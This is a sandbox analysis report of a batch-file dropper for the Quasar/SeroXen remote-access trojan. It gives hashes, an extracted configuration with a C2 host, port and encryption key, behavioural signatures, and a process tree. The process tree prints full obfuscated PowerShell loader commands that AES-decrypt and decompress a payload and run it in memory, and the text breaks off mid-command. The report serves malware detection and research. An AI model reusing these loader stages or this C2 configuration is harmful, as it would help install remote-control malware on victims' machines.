Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-11-2024 17:24

General

  • Target

    Uni.bat

  • Size

    10.4MB

  • MD5

    2cc589a27044382be0ec55f23f36fa41

  • SHA1

    4edc18c1b0e3558086e86d4e5c344fc9bed8d97c

  • SHA256

    d05dd87b7ce909f8f3f85607f9546bcbe1168a507955c4d504d8c83f02d9a909

  • SHA512

    baf948e4257cda2a0c30e9663448e884d40d844cc0f15cb64a9a2ccc40c12d1bdf1b5808d80b19c0f401478504468669d44edcdf0153f88d1b3ceb3303656045

  • SSDEEP

    49152:C/JouIj6nHI8l5lK7g/JLyDX7YVDazqMdubv+JrncVzgH+60gF4SLF+pHGwhESAG:K

Malware Config

Extracted

Family

quasar

Version

1.4.0

Botnet

v15.4.5 | SeroXen

C2

map-casio.gl.at.ply.gg:57345

Mutex

93520150-37f5-4b86-9682-b07d73e61808

Attributes
  • encryption_key

    E9B24DC5A9D33874B0626389429DD789286126DC

  • install_name

    .exe

  • log_directory

    $sxr-Logs

  • reconnect_delay

    230

  • startup_key

    $sxr-seroxen

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 12 IoCs
  • Hide Artifacts: Hidden Window 1 TTPs 11 IoCs

    Windows that would typically be displayed when an application carries out an operation can be hidden.

  • Drops file in System32 directory 21 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 9 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:612
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:64
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{0c4119d6-05b0-4ab8-8ff6-38ea452c7604}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:628
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{81437646-22f2-48ff-b5ef-75a7639f7b63}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4516
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{39ebc9a2-28ab-46ca-9006-c025cd119d57}
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2460
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{f104aac5-33f6-4397-aefe-db717d0ea0ee}
          2⤵
            PID:5604
          • C:\Windows\System32\dllhost.exe
            C:\Windows\System32\dllhost.exe /Processid:{736a245f-4777-4cd5-9894-09f18db561d0}
            2⤵
              PID:2536
          • C:\Windows\system32\lsass.exe
            C:\Windows\system32\lsass.exe
            1⤵
              PID:676
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
              1⤵
                PID:948
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                1⤵
                  PID:392
                • C:\Windows\System32\svchost.exe
                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                  1⤵
                    PID:1036
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                    1⤵
                      PID:1060
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                      1⤵
                        PID:1068
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                        1⤵
                        • Drops file in System32 directory
                        PID:1184
                        • C:\Windows\system32\taskhostw.exe
                          taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                          2⤵
                            PID:2700
                        • C:\Windows\System32\svchost.exe
                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                          1⤵
                            PID:1216
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                            1⤵
                              PID:1296
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                              1⤵
                                PID:1304
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                1⤵
                                  PID:1404
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                  1⤵
                                    PID:1452
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                    1⤵
                                      PID:1464
                                      • C:\Windows\system32\sihost.exe
                                        sihost.exe
                                        2⤵
                                          PID:3016
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                        1⤵
                                          PID:1500
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                          1⤵
                                            PID:1508
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                            1⤵
                                              PID:1652
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                              1⤵
                                                PID:1692
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                1⤵
                                                  PID:1744
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                  1⤵
                                                    PID:1808
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:1836
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                      1⤵
                                                        PID:1960
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                        1⤵
                                                          PID:2040
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                          1⤵
                                                            PID:516
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                            1⤵
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:1768
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                            1⤵
                                                              PID:2064
                                                            • C:\Windows\System32\spoolsv.exe
                                                              C:\Windows\System32\spoolsv.exe
                                                              1⤵
                                                                PID:2112
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                1⤵
                                                                  PID:2224
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                  1⤵
                                                                    PID:2380
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                    1⤵
                                                                      PID:2416
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                      1⤵
                                                                        PID:2420
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                        1⤵
                                                                        • Drops file in System32 directory
                                                                        • Modifies data under HKEY_USERS
                                                                        PID:2520
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                        1⤵
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:2620
                                                                      • C:\Windows\sysmon.exe
                                                                        C:\Windows\sysmon.exe
                                                                        1⤵
                                                                          PID:2652
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                          1⤵
                                                                            PID:2684
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                            1⤵
                                                                              PID:2736
                                                                            • C:\Windows\system32\wbem\unsecapp.exe
                                                                              C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                              1⤵
                                                                                PID:2968
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                1⤵
                                                                                  PID:3036
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                  1⤵
                                                                                    PID:3132
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                    1⤵
                                                                                      PID:3320
                                                                                    • C:\Windows\Explorer.EXE
                                                                                      C:\Windows\Explorer.EXE
                                                                                      1⤵
                                                                                        PID:3436
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
                                                                                          2⤵
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:1804
                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            3⤵
                                                                                              PID:1104
                                                                                            • C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe
                                                                                              "Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $ESXom = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($nboag in $ESXom) { if ($nboag.StartsWith(':: ')) { $BVaSZ = $nboag.Substring(3); break; }; };$kCmVw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($BVaSZ);$eLFSC = New-Object System.Security.Cryptography.AesManaged;$eLFSC.Mode = [System.Security.Cryptography.CipherMode]::CBC;$eLFSC.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$eLFSC.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5l57QE5S9Q7zd5+Bh+XnYYwwzIwQ2OWrX6FXvhoqhNU=');$eLFSC.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X69qeK5Q4la2LJmbSRyhJQ==');$SCino = $eLFSC.CreateDecryptor();$kCmVw = $SCino.TransformFinalBlock($kCmVw, 0, $kCmVw.Length);$SCino.Dispose();$eLFSC.Dispose();$GnclG = New-Object System.IO.MemoryStream(, $kCmVw);$kxUUr = New-Object System.IO.MemoryStream;$vPwQV = New-Object System.IO.Compression.GZipStream($GnclG, [IO.Compression.CompressionMode]::Decompress);$vPwQV.CopyTo($kxUUr);$vPwQV.Dispose();$GnclG.Dispose();$kxUUr.Dispose();$kCmVw = $kxUUr.ToArray();$pGoAa = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($kCmVw);$ZaIus = $pGoAa.EntryPoint;$ZaIus.Invoke($null, (, [string[]] ('')))
                                                                                              3⤵
                                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                              • Checks computer location settings
                                                                                              • Deletes itself
                                                                                              • Executes dropped EXE
                                                                                              • Drops file in System32 directory
                                                                                              • Suspicious use of SetThreadContext
                                                                                              • Drops file in Windows directory
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:4968
                                                                                              • C:\Windows\$sxr-powershell.exe
                                                                                                "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command $anlUr1 = New-Object System.Security.Cryptography.AesManaged;$anlUr1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$anlUr1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$anlUr1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WQ7xjUDnPfG5PbiXJOiO8i63xdLP8mgE5kMDKE91J68=');$anlUr1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xmpga9ilTmadFV8x5TTLlw==');$urjsV = $anlUr1.('rotpyrceDetaerC'[-1..-15] -join '')();$GafqA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('M1P/bEN5TeJTlYnwvwoBzQ==');$GafqA = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA, 0, $GafqA.Length);$GafqA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA);$NMzNk = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jwDvjE8u1AZhp5INXc7TplaZSkDXLRgYlXiSkattzz4=');$NMzNk = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NMzNk, 0, $NMzNk.Length);$NMzNk = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NMzNk);$BMrdp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('r10oypoGo0/m3rKwA8IF2g==');$BMrdp = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BMrdp, 0, $BMrdp.Length);$BMrdp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BMrdp);$fQagi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UQl1+c1LsXNoNlVlu++5BCtfQBeMggBXSOWlqhF0RzsuDO4xxT/1tTYplVm9kMAXwqmXlynI1POrnsaQenpIgchIYv+fX/Y40rwNivy9n+uTQqeDTtp2iRuwv2aAVO1P7rXnjEL3u/T8J3qUa/KLR5DMfX5iHVSoJL4M65vg1Tk1Z3Vu6oGBqf7Kh18mwtexuQ3VCVJp9vghCNvOekBYB5rsz1UhcwtzPQnVdoTKOdAjgrZVTT6BrRBX6UyhB1sU+7lVNIrVbm0D5prQl2SXnvE/vJPBKwL/T8ngncrMZgsT/9nWPwhff7M67YWZ3ZzbBO79tVFElCZzi8sxcenyTlGLfP09qWFl2b1PTmjZ6LSLpybl/NVoBs/yomtvg8IQh7SmCJg89aukB/4Lew/3BJI8gLtvpxboIEvm4V/xoxQ=');$fQagi = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fQagi, 0, $fQagi.Length);$fQagi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fQagi);$UBaRj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kflOm5VpUnmzCZ3totJLvA==');$UBaRj = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UBaRj, 0, $UBaRj.Length);$UBaRj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UBaRj);$iMzoS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1p79lcTTb+0h1E/tOSfYpQ==');$iMzoS = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iMzoS, 0, $iMzoS.Length);$iMzoS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($iMzoS);$SqBAi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Qr1Ct+kg97NICSuvML3j3g==');$SqBAi = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SqBAi, 0, $SqBAi.Length);$SqBAi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SqBAi);$aKzQO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R3E5F71C72ydnV0ijnBtqg==');$aKzQO = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($aKzQO, 0, $aKzQO.Length);$aKzQO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($aKzQO);$mtFou = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SdbB2Vbfc+H53F0otJpLmA==');$mtFou = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mtFou, 0, $mtFou.Length);$mtFou = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mtFou);$GafqA0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('apyzJJvxlKga7Z4Fht3ddA==');$GafqA0 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA0, 0, $GafqA0.Length);$GafqA0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA0);$GafqA1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('t4viY8qTA+Lqvt+34vYwyg==');$GafqA1 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA1, 0, $GafqA1.Length);$GafqA1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA1);$GafqA2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JecwdtmO+zc3+tVdmq/g3A==');$GafqA2 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA2, 0, $GafqA2.Length);$GafqA2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA2);$GafqA3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0DoDJukiSJzGzhkiHGn90w==');$GafqA3 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA3, 0, $GafqA3.Length);$GafqA3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA3);$urjsV.Dispose();$anlUr1.Dispose();$uFKhy = [Microsoft.Win32.Registry]::$aKzQO.$SqBAi($GafqA).$iMzoS($NMzNk);$UjYbd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($uFKhy);$anlUr = New-Object System.Security.Cryptography.AesManaged;$anlUr.Mode = [System.Security.Cryptography.CipherMode]::CBC;$anlUr.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$anlUr.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WQ7xjUDnPfG5PbiXJOiO8i63xdLP8mgE5kMDKE91J68=');$anlUr.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xmpga9ilTmadFV8x5TTLlw==');$AVMxA = $anlUr.('rotpyrceDetaerC'[-1..-15] -join '')();$UjYbd = $AVMxA.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UjYbd, 0, $UjYbd.Length);$AVMxA.Dispose();$anlUr.Dispose();$UfHVP = New-Object System.IO.MemoryStream(, $UjYbd);$JxIrd = New-Object System.IO.MemoryStream;$bxryN = New-Object System.IO.Compression.GZipStream($UfHVP, [IO.Compression.CompressionMode]::$GafqA1);$bxryN.$mtFou($JxIrd);$bxryN.Dispose();$UfHVP.Dispose();$JxIrd.Dispose();$UjYbd = $JxIrd.ToArray();$MYzXI = $fQagi | IEX;$ZiLWi = $MYzXI::$GafqA2($UjYbd);$xvMDX = $ZiLWi.EntryPoint;$xvMDX.$GafqA0($null, (, [string[]] ($BMrdp)))
                                                                                                4⤵
                                                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                • Executes dropped EXE
                                                                                                • Hide Artifacts: Hidden Window
                                                                                                • Drops file in System32 directory
                                                                                                • Suspicious use of SetThreadContext
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:2256
                                                                                                • C:\Windows\$sxr-powershell.exe
                                                                                                  "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(2256).WaitForExit();[System.Threading.Thread]::Sleep(5000); $anlUr1 = New-Object System.Security.Cryptography.AesManaged;$anlUr1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$anlUr1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$anlUr1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WQ7xjUDnPfG5PbiXJOiO8i63xdLP8mgE5kMDKE91J68=');$anlUr1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xmpga9ilTmadFV8x5TTLlw==');$urjsV = $anlUr1.('rotpyrceDetaerC'[-1..-15] -join '')();$GafqA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('M1P/bEN5TeJTlYnwvwoBzQ==');$GafqA = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA, 0, $GafqA.Length);$GafqA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA);$NMzNk = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jwDvjE8u1AZhp5INXc7TplaZSkDXLRgYlXiSkattzz4=');$NMzNk = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NMzNk, 0, $NMzNk.Length);$NMzNk = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NMzNk);$BMrdp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('r10oypoGo0/m3rKwA8IF2g==');$BMrdp = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BMrdp, 0, $BMrdp.Length);$BMrdp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BMrdp);$fQagi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('UQl1+c1LsXNoNlVlu++5BCtfQBeMggBXSOWlqhF0RzsuDO4xxT/1tTYplVm9kMAXwqmXlynI1POrnsaQenpIgchIYv+fX/Y40rwNivy9n+uTQqeDTtp2iRuwv2aAVO1P7rXnjEL3u/T8J3qUa/KLR5DMfX5iHVSoJL4M65vg1Tk1Z3Vu6oGBqf7Kh18mwtexuQ3VCVJp9vghCNvOekBYB5rsz1UhcwtzPQnVdoTKOdAjgrZVTT6BrRBX6UyhB1sU+7lVNIrVbm0D5prQl2SXnvE/vJPBKwL/T8ngncrMZgsT/9nWPwhff7M67YWZ3ZzbBO79tVFElCZzi8sxcenyTlGLfP09qWFl2b1PTmjZ6LSLpybl/NVoBs/yomtvg8IQh7SmCJg89aukB/4Lew/3BJI8gLtvpxboIEvm4V/xoxQ=');$fQagi = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($fQagi, 0, $fQagi.Length);$fQagi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($fQagi);$UBaRj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kflOm5VpUnmzCZ3totJLvA==');$UBaRj = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UBaRj, 0, $UBaRj.Length);$UBaRj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UBaRj);$iMzoS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1p79lcTTb+0h1E/tOSfYpQ==');$iMzoS = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iMzoS, 0, $iMzoS.Length);$iMzoS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($iMzoS);$SqBAi = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Qr1Ct+kg97NICSuvML3j3g==');$SqBAi = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SqBAi, 0, $SqBAi.Length);$SqBAi = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SqBAi);$aKzQO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('R3E5F71C72ydnV0ijnBtqg==');$aKzQO = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($aKzQO, 0, $aKzQO.Length);$aKzQO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($aKzQO);$mtFou = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('SdbB2Vbfc+H53F0otJpLmA==');$mtFou = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mtFou, 0, $mtFou.Length);$mtFou = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mtFou);$GafqA0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('apyzJJvxlKga7Z4Fht3ddA==');$GafqA0 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA0, 0, $GafqA0.Length);$GafqA0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA0);$GafqA1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('t4viY8qTA+Lqvt+34vYwyg==');$GafqA1 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA1, 0, $GafqA1.Length);$GafqA1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA1);$GafqA2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JecwdtmO+zc3+tVdmq/g3A==');$GafqA2 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA2, 0, $GafqA2.Length);$GafqA2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA2);$GafqA3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0DoDJukiSJzGzhkiHGn90w==');$GafqA3 = $urjsV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GafqA3, 0, $GafqA3.Length);$GafqA3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GafqA3);$urjsV.Dispose();$anlUr1.Dispose();$uFKhy = [Microsoft.Win32.Registry]::$aKzQO.$SqBAi($GafqA).$iMzoS($NMzNk);$UjYbd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($uFKhy);$anlUr = New-Object System.Security.Cryptography.AesManaged;$anlUr.Mode = [System.Security.Cryptography.CipherMode]::CBC;$anlUr.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$anlUr.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WQ7xjUDnPfG5PbiXJOiO8i63xdLP8mgE5kMDKE91J68=');$anlUr.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xmpga9ilTmadFV8x5TTLlw==');$AVMxA = $anlUr.('rotpyrceDetaerC'[-1..-15] -join '')();$UjYbd = $AVMxA.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UjYbd, 0, $UjYbd.Length);$AVMxA.Dispose();$anlUr.Dispose();$UfHVP = New-Object System.IO.MemoryStream(, $UjYbd);$JxIrd = New-Object System.IO.MemoryStream;$bxryN = New-Object System.IO.Compression.GZipStream($UfHVP, [IO.Compression.CompressionMode]::$GafqA1);$bxryN.$mtFou($JxIrd);$bxryN.Dispose();$UfHVP.Dispose();$JxIrd.Dispose();$UjYbd = 